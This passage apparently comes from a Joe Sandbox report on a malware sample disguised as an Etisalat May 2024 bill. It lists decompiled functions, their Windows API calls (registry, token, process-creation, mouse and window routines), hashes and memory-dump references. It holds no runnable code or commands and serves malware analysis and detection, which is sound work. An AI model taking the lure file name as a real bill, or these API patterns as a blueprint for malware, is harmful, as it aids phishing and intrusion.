                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: MessageSend$CreateObjectStockWindow
                                      • String ID: Msctls_Progress32
                                      • API String ID: 1025951953-3636473452
                                      • Opcode ID: ad18d018114dd0f850de553ec4f3a5f90821881bef30afe4747c45d82c81b964
                                      • Instruction ID: 7103fd3704db77fc7b7d7cd2147b558a6f2f7d3549a27298702f6f253cb8b439
                                      • Opcode Fuzzy Hash: ad18d018114dd0f850de553ec4f3a5f90821881bef30afe4747c45d82c81b964
                                      • Instruction Fuzzy Hash: 4F1182B255021ABFEF159F65CC85EEB7F6DEF08758F014125FA04A6090CB72AC21DBA4
                                      Function 00B841C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00B84292,?), ref: 00B841E3
                                      • GetProcAddress.KERNEL32(00000000), ref: 00B841EA
                                      • EncodePointer.KERNEL32(00000000), ref: 00B841F6
                                      • DecodePointer.KERNEL32(00000001,00B84292,?), ref: 00B84213
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                      • String ID: RoInitialize$combase.dll
                                      • API String ID: 3489934621-340411864
                                      • Opcode ID: 6e09a651bcd0c3d3ad4c2f8650da49c55e6235342e2a71fcbaecb144ccb389f5
                                      • Instruction ID: 664caaad17849d2d22a49726b6ebc748cedfe8a5aa968468ad3baf87876ee546
                                      • Opcode Fuzzy Hash: 6e09a651bcd0c3d3ad4c2f8650da49c55e6235342e2a71fcbaecb144ccb389f5
                                      • Instruction Fuzzy Hash: CEE0EDB85A0346DBDF206FB0EC49B2C3AD4A760B02F504474B511EA4B0DBB544A68F04
                                      Function 00B8429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00B841B8), ref: 00B842B8
                                      • GetProcAddress.KERNEL32(00000000), ref: 00B842BF
                                      • EncodePointer.KERNEL32(00000000), ref: 00B842CA
                                      • DecodePointer.KERNEL32(00B841B8), ref: 00B842E5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                      • String ID: RoUninitialize$combase.dll
                                      • API String ID: 3489934621-2819208100
                                      • Opcode ID: 30116da9358face8cc78c067c49e3a69d8830d0f3f62e009ef291f02b0020c46
                                      • Instruction ID: 8780ddfc261abaac6a3a9268f4466cb508c9ac7d597d1b2bcd0cf11f3eb4d75e
                                      • Opcode Fuzzy Hash: 30116da9358face8cc78c067c49e3a69d8830d0f3f62e009ef291f02b0020c46
                                      • Instruction Fuzzy Hash: 6FE0927C6A5246ABEA24AF60ED49F283AA4BB24742F104168F511EA4B0CBB44555DB18
                                      Function 00BC675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _memmove$__itow__swprintf
                                      • String ID:
                                      • API String ID: 3253778849-0
                                      • Opcode ID: 42b24a324091847f88bd39119417456c8445345a43b35406fb951533c7be60ac
                                      • Instruction ID: 5ebee361f179d37e86d86b41e98630ae84e55ab3260256fafcd38abb7486b53b
                                      • Opcode Fuzzy Hash: 42b24a324091847f88bd39119417456c8445345a43b35406fb951533c7be60ac
                                      • Instruction Fuzzy Hash: 92617B3050065A9BCF11EF64CC81FFE37E8EF48308F044599F95A5B1A2DA78AD46CB51
                                      Function 00BE046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B67F41: _memmove.LIBCMT ref: 00B67F82
                                        • Part of subcall function 00BE10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BE0038,?,?), ref: 00BE10BC
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BE0548
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BE0588
                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00BE05AB
                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00BE05D4
                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00BE0617
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00BE0624
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                      • String ID:
                                      • API String ID: 4046560759-0
                                      • Opcode ID: bd7548cc9b14be3d6c3adeea159cafa9a25d1822f3705531e46fcd333f6bb49d
                                      • Instruction ID: 2a3d0231e00c12d2d4405171924a5fb4c280e7a8bb9507108f32521782eedd36
                                      • Opcode Fuzzy Hash: bd7548cc9b14be3d6c3adeea159cafa9a25d1822f3705531e46fcd333f6bb49d
                                      • Instruction Fuzzy Hash: 37516A31118241AFCB10EF64C885E6FBBE8FF84314F0449ADF5858B2A2DB75E945CB52
                                      Function 00BE5A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetMenu.USER32(?), ref: 00BE5A82
                                      • GetMenuItemCount.USER32(00000000), ref: 00BE5AB9
                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00BE5AE1
                                      • GetMenuItemID.USER32(?,?), ref: 00BE5B50
                                      • GetSubMenu.USER32(?,?), ref: 00BE5B5E
                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 00BE5BAF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Menu$Item$CountMessagePostString
                                      • String ID:
                                      • API String ID: 650687236-0
                                      • Opcode ID: b5a48b960854e196ed55561fa744d04c05a5c56d4812cbcc1c193d37aac40256
                                      • Instruction ID: 8e34c0869a3fc85283795d016caca26b7813c3cc728cf9b7179cdfbb8d2d3d23
                                      • Opcode Fuzzy Hash: b5a48b960854e196ed55561fa744d04c05a5c56d4812cbcc1c193d37aac40256
                                      • Instruction Fuzzy Hash: B7517D31A00615AFCF21EFA5C885AAEB7F4EF48314F1444A9F902BB351CB74AE41CB90
                                      Function 00BBF3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                      Download Yara Rule
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 00BBF3F7
                                      • VariantClear.OLEAUT32(00000013), ref: 00BBF469
                                      • VariantClear.OLEAUT32(00000000), ref: 00BBF4C4
                                      • _memmove.LIBCMT ref: 00BBF4EE
                                      • VariantClear.OLEAUT32(?), ref: 00BBF53B
                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00BBF569
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Variant$Clear$ChangeInitType_memmove
                                      • String ID:
                                      • API String ID: 1101466143-0
                                      • Opcode ID: bca999e688585bb654c11dc8c5f4212ef7640f0e4ee053d7b83a1e29994e7774
                                      • Instruction ID: 98261ada8ad57ef93aa444198662da0be09ac489687ba24d584e7f927e3e8b82
                                      • Opcode Fuzzy Hash: bca999e688585bb654c11dc8c5f4212ef7640f0e4ee053d7b83a1e29994e7774
                                      • Instruction Fuzzy Hash: 01516AB5A0020AEFCB10CF58D880EAAB7F8FF4C354B1585A9E959DB350D770E911CBA0
                                      Function 00BC26F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00BC2747
                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BC2792
                                      • IsMenu.USER32(00000000), ref: 00BC27B2
                                      • CreatePopupMenu.USER32 ref: 00BC27E6
                                      • GetMenuItemCount.USER32(000000FF), ref: 00BC2844
                                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00BC2875
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                      • String ID:
                                      • API String ID: 3311875123-0
                                      • Opcode ID: 4a4251e1fa9986b8a8cad80cc7741c131bffc87bd5dd1164cbb9a4d016ed8600
                                      • Instruction ID: d576d512e8ce7a152a55c840d21dcf9c454de5a02b692766096f8f2b3935d114
                                      • Opcode Fuzzy Hash: 4a4251e1fa9986b8a8cad80cc7741c131bffc87bd5dd1164cbb9a4d016ed8600
                                      • Instruction Fuzzy Hash: 5D519D70A0034AEBDF25CF68D988FAEBBF5EF54314F1041ADE8219B291D7709944CB61
                                      Function 00B61765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B62612: GetWindowLongW.USER32(?,000000EB), ref: 00B62623
                                      • BeginPaint.USER32(?,?,?,?,?,?), ref: 00B6179A
                                      • GetWindowRect.USER32(?,?), ref: 00B617FE
                                      • ScreenToClient.USER32(?,?), ref: 00B6181B
                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00B6182C
                                      • EndPaint.USER32(?,?), ref: 00B61876
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                      • String ID:
                                      • API String ID: 1827037458-0
                                      • Opcode ID: c249791ff121ae388c215aec558f471dc1590b5b71d4eaca9c9866f719a4bbbe
                                      • Instruction ID: 7e3f0973b86af7821f7717095587124dd5d2109d109a7788418ece327327fe40
                                      • Opcode Fuzzy Hash: c249791ff121ae388c215aec558f471dc1590b5b71d4eaca9c9866f719a4bbbe
                                      • Instruction Fuzzy Hash: 84419F70100341AFDB11DF29D8C4FBA7BE8EB45724F084AA8F5958B2A1CB349845DB61
                                      Function 00BEB958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ShowWindow.USER32(00C267B0,00000000,016458D8,?,?,00C267B0,?,00BEB862,?,?), ref: 00BEB9CC
                                      • EnableWindow.USER32(00000000,00000000), ref: 00BEB9F0
                                      • ShowWindow.USER32(00C267B0,00000000,016458D8,?,?,00C267B0,?,00BEB862,?,?), ref: 00BEBA50
                                      • ShowWindow.USER32(00000000,00000004,?,00BEB862,?,?), ref: 00BEBA62
                                      • EnableWindow.USER32(00000000,00000001), ref: 00BEBA86
                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00BEBAA9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Window$Show$Enable$MessageSend
                                      • String ID:
                                      • API String ID: 642888154-0
                                      • Opcode ID: c704967284133ee699c4151828b48056785c57b54be3c022eb36841b4e655501
                                      • Instruction ID: 0942bb378da6486755043131db29804c65756455a2e223a4273cf0d519f99759
                                      • Opcode Fuzzy Hash: c704967284133ee699c4151828b48056785c57b54be3c022eb36841b4e655501
                                      • Instruction Fuzzy Hash: 7D413034600281AFDB26CF56C489FA67BE1FF05314F1842F9EA498F6A3CB31A845DB51
                                      Function 00BD73B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,00BD5134,?,?,00000000,00000001), ref: 00BD73BF
                                        • Part of subcall function 00BD3C94: GetWindowRect.USER32(?,?), ref: 00BD3CA7
                                      • GetDesktopWindow.USER32 ref: 00BD73E9
                                      • GetWindowRect.USER32(00000000), ref: 00BD73F0
                                      • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00BD7422
                                        • Part of subcall function 00BC54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00BC555E
                                      • GetCursorPos.USER32(?), ref: 00BD744E
                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00BD74AC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                      • String ID:
                                      • API String ID: 4137160315-0
                                      • Opcode ID: d879c4b547ac44936d851c3d71308584a4213fb86b0744402718f062ae9f675a
                                      • Instruction ID: fac254b8fcd5b793dd0978b07506bc2378408569546734fe93b77427ac920a09
                                      • Opcode Fuzzy Hash: d879c4b547ac44936d851c3d71308584a4213fb86b0744402718f062ae9f675a
                                      • Instruction Fuzzy Hash: D9310832508346AFC720DF14C849F9BBBE9FF98314F00091AF48497291DB70EA44CB92
                                      Function 00BB8D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00BB85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00BB8608
                                        • Part of subcall function 00BB85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00BB8612
                                        • Part of subcall function 00BB85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00BB8621
                                        • Part of subcall function 00BB85F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00BB8628
                                        • Part of subcall function 00BB85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00BB863E
                                      • GetLengthSid.ADVAPI32(?,00000000,00BB8977), ref: 00BB8DAC
                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00BB8DB8
                                      • HeapAlloc.KERNEL32(00000000), ref: 00BB8DBF
                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 00BB8DD8
                                      • GetProcessHeap.KERNEL32(00000000,00000000,00BB8977), ref: 00BB8DEC
                                      • HeapFree.KERNEL32(00000000), ref: 00BB8DF3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                      • String ID:
                                      • API String ID: 3008561057-0
                                      • Opcode ID: ecebee923452b6ba1b95f6f3f14387bbed4f4814cee84229289fda965a3c5ce6
                                      • Instruction ID: 95d7a855a5a7f50c447fc0052666b495652c8890c8177b3118e1da193e1827ff
                                      • Opcode Fuzzy Hash: ecebee923452b6ba1b95f6f3f14387bbed4f4814cee84229289fda965a3c5ce6
                                      • Instruction Fuzzy Hash: D1119D31500605EBDF109F64CC49BFE77ADEB55316F1041AEE945A7290CB719900CB60
                                      Function 00BB8AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00BB8B2A
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00BB8B31
                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00BB8B40
                                      • CloseHandle.KERNEL32(00000004), ref: 00BB8B4B
                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00BB8B7A
                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00BB8B8E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                      • String ID:
                                      • API String ID: 1413079979-0
                                      • Opcode ID: e60c477828cb4a696fcd0d7222925b4d1c95d211d0914485c8143c966c617fed
                                      • Instruction ID: 408ac1367fd90ce71239e303b26526d657ff82940ffac8540f6a9e16e5c9fec9
                                      • Opcode Fuzzy Hash: e60c477828cb4a696fcd0d7222925b4d1c95d211d0914485c8143c966c617fed
                                      • Instruction Fuzzy Hash: F8111DB250124AABDB119FA4ED49FEA7BADEF48304F044065FA04A6160CB769D60DB60
                                      Function 00BEC19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B612F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00B6134D
                                        • Part of subcall function 00B612F3: SelectObject.GDI32(?,00000000), ref: 00B6135C
                                        • Part of subcall function 00B612F3: BeginPath.GDI32(?), ref: 00B61373
                                        • Part of subcall function 00B612F3: SelectObject.GDI32(?,00000000), ref: 00B6139C
                                      • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00BEC1C4
                                      • LineTo.GDI32(00000000,00000003,?), ref: 00BEC1D8
                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00BEC1E6
                                      • LineTo.GDI32(00000000,00000000,?), ref: 00BEC1F6
                                      • EndPath.GDI32(00000000), ref: 00BEC206
                                      • StrokePath.GDI32(00000000), ref: 00BEC216
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                      • String ID:
                                      • API String ID: 43455801-0
                                      • Opcode ID: a468c7ff32c611216bb5c059f248a61d5535e738bcc594af6b24760e988d3e00
                                      • Instruction ID: 2d664ac351426bce68f27d23e3af914765649681d7a3fce5b580801043769f8a
                                      • Opcode Fuzzy Hash: a468c7ff32c611216bb5c059f248a61d5535e738bcc594af6b24760e988d3e00
                                      • Instruction Fuzzy Hash: 1A115B7600014DFFDF119F90DC88FAA3FADEF08350F048061BA089A1A2C7719E55DBA0
                                      Function 00B803A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B803D3
                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00B803DB
                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B803E6
                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B803F1
                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00B803F9
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B80401
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
